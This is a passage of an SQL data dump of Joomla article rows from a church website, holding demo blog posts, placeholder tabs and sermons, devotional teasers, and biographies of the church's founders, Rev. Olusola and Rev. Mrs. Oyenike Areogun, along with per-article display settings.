(76, 151, 'Have faith in your abilities', 'have-faith-in-your-abilities', '<a data-spotlight=\"on\" data-lightbox=\"transitionIn:elastic; transitionOut:elastic;\" href=\"images/demo/blog/blog_2.png\"><img src=\"images/demo/blog/blog_2.png\" alt=\"arrowthemes\" width=\"856\" height=\"315\" /></a>\r\n\r\n<p class=\"dropcap\">The world owes you nothing. It was here first. Do not dwell in the past, do not dream of the future, concentrate the mind on the present moment. Never be bullied into silence. Never allow yourself to be made a victim.</p>\r\n\r\n', '\r\n\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.<p>\r\n  \r\n[blockquote author=\"John Doe\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n\r\n  <p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 1, 27, '2012-08-30 13:21:21', 196, '', '2014-07-26 08:57:33', 42, 0, '0000-00-00 00:00:00', '2012-08-30 13:21:21', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 9, 3, '', '', 1, 420, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(77, 152, 'Everything should be simple', 'everything-should-be-simple', '<a data-spotlight=\"on\" data-lightbox=\"on\" href=\"images/demo/blog/blog_3.png\"><img src=\"images/demo/blog/blog_3.png\" alt=\"arrowthemes\" width=\"856\" height=\"315\" /></a>\r\n\r\n<p class=\"dropcap\">Throughout life people will make you mad, disrespect you and treat you bad. Let God deal with the things they do, cause hate in your heart will consume you too. Be kind whenever possible. It is always possible. Everything should be as simple as it is</p>\r\n\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n\r\n', '\r\n\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.<p>\r\n\r\n<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 1, 27, '2012-08-30 13:21:21', 196, '', '2014-07-26 08:57:51', 42, 0, '0000-00-00 00:00:00', '2012-08-30 13:21:21', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 6, 2, '', '', 1, 382, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(78, 153, 'It is always possible', 'it-is-always-possible', '<a data-spotlight=\"on\" data-lightbox=\"on\" href=\"images/demo/blog/blog_2.png\"><img src=\"images/demo/blog/blog_2.png\" alt=\"arrowthemes\" width=\"856\" height=\"315\" /></a>\r\n\r\n<p class=\"dropcap\">Throughout life people will make you mad, disrespect you and treat you bad. Let God deal with the things they do, cause hate in your heart will consume you too. Be kind whenever possible. It is always possible. Everything should be as simple as it is</p>\r\n\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n\r\n', '\r\n\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.<p>\r\n\r\n<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 1, 27, '2012-08-30 13:21:21', 196, '', '2014-07-26 08:58:08', 42, 0, '0000-00-00 00:00:00', '2012-08-30 13:21:21', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 6, 1, '', '', 1, 529, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(82, 158, 'You are Welcome', 'you-are-welcome', '<p><img src=\"images/demo/dad-mum.jpg\" alt=\"\" width=\"115\" height=\"148\" style=\"margin: 5px; float: left;\" />You are welcome to this website. That you have logged on to this site is not an accident. It is a positive proof that God has a great plan for you. Mor<span style=\"color: inherit; font-family: inherit; font-size: inherit; font-style: inherit; font-variant-ligatures: inherit; font-variant-caps: inherit; font-weight: inherit;\">eover, you can find out information on the happenings in the Life Oasis Int&rsquo;l Church and how you can be a part of this assignment. Keep Coming Back. Go and Win With JESUS. - Rev. &amp; Rev.(Mrs.) Olusola Areogun.</span></p>\r\n<p>&nbsp;</p>', '', 1, 29, '2012-09-15 08:15:08', 196, '', '2017-08-12 19:11:50', 196, 0, '0000-00-00 00:00:00', '2012-09-15 08:15:08', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"0\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 39, 3, '', '', 1, 778, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(83, 159, 'Keep daily appointment with God', 'appointment', '<p><img src=\"images/appintment.jpg\" alt=\"\" /></p>\r\n<p class=\"dropcap\"><span style=\"background-color: rgba(255, 255, 255, 0.117647); color: #403b38; font-family: \'Varela Round\', sans-serif; font-size: 15px;\">Those who keep their appointments with God have far more supernatural... </span><span style=\"font-size: 12.16px;\">.</span></p>\r\n<p class=\"dropcap\">[button color href=\"resources/blog/item/55-divine-appointment\"]Read More[/button]</p>', '', 1, 29, '2017-07-16 09:38:00', 196, '', '2017-07-16 11:44:04', 196, 0, '0000-00-00 00:00:00', '2017-07-16 09:38:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 76, 2, '', '', 1, 4737, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(84, 160, 'Don\'t serve God carelessly', 'heart', '<p><img class=\"pic-border\" src=\"images/serve.jpg\" alt=\"\" width=\"410\" height=\"126\" /></p>\r\n<p class=\"dropcap\"><span style=\"background-color: rgba(255, 255, 255, 0.117647); color: #403b38; font-family: \'Varela Round\', sans-serif; font-size: 15px;\"> God is a God of excellence and order. He does not accept just anything.</span><span style=\"font-size: 12.16px;\">.</span></p>\r\n<p class=\"dropcap\">[button color href=\"resources/blog/item/56-don-t-serve-god-carelessly-from-our-father-s-heart-02-07-2017\"]Read More[/button]</p>', '', 1, 29, '2017-07-16 09:38:00', 196, '', '2017-07-16 11:45:47', 196, 0, '0000-00-00 00:00:00', '2017-07-16 09:38:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"1\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 80, 1, '', '', 1, 3139, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(85, 164, 'Tab 1', 'tab-1', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>', '', 1, 31, '2012-10-11 13:26:54', 196, '', '0000-00-00 00:00:00', 0, 0, '0000-00-00 00:00:00', '2012-10-11 13:26:54', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 1, 2, '', '', 1, 368, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(86, 165, 'Tab 2', 'tab-2', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>', '', 1, 31, '2012-10-11 13:26:54', 196, '', '2012-10-11 13:27:15', 42, 0, '0000-00-00 00:00:00', '2012-10-11 13:26:54', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 2, 1, '', '', 1, 619, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(87, 166, 'Tab 3', 'tab-3', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>', '', 1, 31, '2012-10-11 13:26:54', 196, '', '2012-10-11 13:27:15', 0, 0, '0000-00-00 00:00:00', '2012-10-11 13:26:54', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 1, 0, '', '', 1, 767, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(88, 167, 'Our Founder', 'our-founder', '<p><img class=\"pic3d uk-align-right\" src=\"images/daddy.png\" alt=\"Joomla\" /></p>\r\n<p>[h3 dotted] <strong>Rev Olusola</strong> Ayodele Areogun[/h3]</p>\r\n<p>Olusola Ayodele Areogun is an ordained minister of the gospel. He serves the will of God in this generation as author, teacher, church planter and mentor of leaders for the next generation with varied ministerial exposure and experience. He also serves as a Father and cover to many up and coming ministries.</p>\r\n<p>He is the President of Sola Areogun Ministries Incorporated and the General Overseer of THE DREAM CENTRE OF THE LIFE OASIS INT’L CHURCHES. His daily Radio/TV programme, “Living By the Answer” is heard across Nigeria, Africa, U.K, Europe and the U.S. Other outreaches include Web of Wisdom Minister’s Conference, a bi-annual event to refresh and re-fire ministers of the gospel, the Living Jesus Ministerial Training Institute (a full time Bible School), Eagle Media, Spirit Meat (a freely distributed daily devotional guide) and Abundant Life House, the publishing arm has over one hundred and forty publications.</p>\r\n<p>In a Vision, he saw himself standing before the Lord with other servants of God to pick their life assignment; when his turn came, he picked a sheet of paper on which was written; “COMMITTED TO HELPING MEN REALIZE THEIR GOD-GIVEN DREAMS IN LIFE”. This sums up the heartbeat of this servant of God. He is happily married to Oyenike, also an ordained minister of the gospel. They are parents of two young adults, Joshua and Peace, who are also serving with them in the ministry</p>\r\n<p> </p>\r\n<p><img class=\"pic3d uk-align-right\" src=\"images/mummy.png\" alt=\"Joomla\" /></p>\r\n<p>[h3 dotted] <strong>Rev Mrs. Oyenike</strong>  Areogun[/h3]</p>\r\n<p>Oyenike Areogun is an ordained minister of the Gospel. She serves the will of God in this generation as an Intercessor, Church Pastor, Pastor\'s wife, Mother, Conference speaker and Church administrator. She also operates in a prophetic ministry whose accuracy has brought increase and joy to God\'s people. She is also a minstrel bringing songs from God\'s presence - THRONE ROOM MUSIC.</p>\r\n<p>She is the Vice President of the Living Jesus Ministries (Inc.). She ministers alongside her husband, Rev. Olusola Areogun on Living by the Answer- a TV programme aired in Nigeria, Africa, U.K, Europe and USA and also hosts two weekly television programmes, The Joy of Every Woman, Temi A Se Se and ‘Bawo Ni Idile Yin Se Ri? for family matters and ‘Ounje Emi’, a Yoruba weekly radio programme.</p>\r\n<p>Since 1995, she has been organizing the ‘All Women Congress on World Evangelization’. She alongside her husband also hosts Quarterly Students in Ministry Mentorship Programme (SIMMP) for student in the institutions of higher learning across the country; a monthly meeting for single ladies – “Daughters of Destiny” and a Women in Ministry Mentorship Programme (WIMMP) to train women for ministry.</p>\r\n<p>She is the Senior Pastor of the Dream Centre of the Life Oasis International Church. She is married to Rev. Olusola Areogun and they are blessed with two young adults.</p>\r\n<p> </p>', '', 1, 37, '2012-10-11 13:46:19', 196, '', '2017-05-03 00:08:22', 196, 0, '0000-00-00 00:00:00', '2012-10-11 13:46:19', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 17, 16, '', '', 1, 14686, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(89, 169, 'My Redeemer Liveth', 'my-redeemer-liveth', '<p>[audio src=\"images/demo/audio/sermon.mp3\" type=\"audio/mpeg\"][/audio]</p>\r\n<p class=\"dropcap\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam dapibus, tellus ac ornare aliquam, massa diam tristique urna, id faucibus lectus erat ut pede. Maecenas varius neque nec libero laoreet faucibus.</p>\r\n<p>[button href=\"#\"]Live Streaming[/button] [button color href=\"#\"]Download now[/button]</p>', '', 1, 32, '2014-08-01 12:06:00', 196, '', '2014-08-09 12:49:40', 42, 0, '0000-00-00 00:00:00', '2014-08-01 12:06:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 7, 5, '', '', 1, 438, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(90, 170, 'Spiritual Adoption', 'spiritual-adoption', '<p>[audio src=\"images/demo/audio/sermon.mp3\" type=\"audio/mpeg\"][/audio]</p>\r\n<p class=\"dropcap\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam dapibus, tellus ac ornare aliquam, massa diam tristique urna, id faucibus lectus erat ut pede. Maecenas varius neque nec libero laoreet faucibus.</p>\r\n<p>[button href=\"#\"]Live Streaming[/button] [button color href=\"#\"]Download now[/button]</p>', '', 1, 32, '2014-08-01 12:06:00', 196, '', '2014-08-09 12:49:34', 42, 0, '0000-00-00 00:00:00', '2014-08-01 12:06:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 11, 4, '', '', 1, 725, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(91, 171, 'The Perfection', 'the-perfection', '<p>[audio src=\"images/demo/audio/sermon.mp3\" type=\"audio/mpeg\"][/audio]</p>\r\n<p class=\"dropcap\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam dapibus, tellus ac ornare aliquam, massa diam tristique urna, id faucibus lectus erat ut pede. Maecenas varius neque nec libero laoreet faucibus.</p>\r\n<p>[button href=\"#\"]Live Streaming[/button] [button color href=\"#\"]Download now[/button]</p>', '', 1, 32, '2014-08-01 12:06:00', 196, '', '2014-08-09 12:49:19', 42, 0, '0000-00-00 00:00:00', '2014-08-01 12:06:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', 